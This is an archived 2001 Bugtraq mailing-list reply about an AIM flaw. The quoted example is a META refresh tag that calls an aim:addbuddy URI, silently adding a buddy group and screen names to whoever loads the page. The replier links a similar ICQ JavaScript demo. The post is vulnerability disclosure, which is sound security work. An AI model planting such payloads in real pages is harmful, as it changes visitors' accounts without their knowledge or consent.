Re: AIM forced behavior "issue"
From: Knud Erik Højgaard (kain@egotrip.dk)Date: 07/16/01
- Previous message: Jelmer: "ICQ and MSIE allow execution of arbitrary code"
- In reply to: orb: "AIM forced behavior "issue""
- Next in thread: Bojidar Alexandrov: "Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code"
- Reply: Bojidar Alexandrov: "Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Knud Erik Højgaard <kain@egotrip.dk> To: "orb" <orb@mindflip.org>, <bugtraq@securityfocus.com> Date: Mon, 16 Jul 2001 22:44:53 +0200
> Example
> <META
>
HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg
,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>
>
> A web page loaded with the above code in it's META REFRESH tag would
> automatically add a group to the users buddylist called mindfliporg and
> add buddy's
> mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to the group.
We tried some similar stuff with icq a while ago, live example at
http://knudergud.dk/dev/icq.html ..
it seems broken now, but the idea should be obvious. adding to a contact
list using javascript, requiring
no user interaction.. stupid software.
-Knud
- Previous message: Jelmer: "ICQ and MSIE allow execution of arbitrary code"
- In reply to: orb: "AIM forced behavior "issue""
- Next in thread: Bojidar Alexandrov: "Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code"
- Reply: Bojidar Alexandrov: "Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
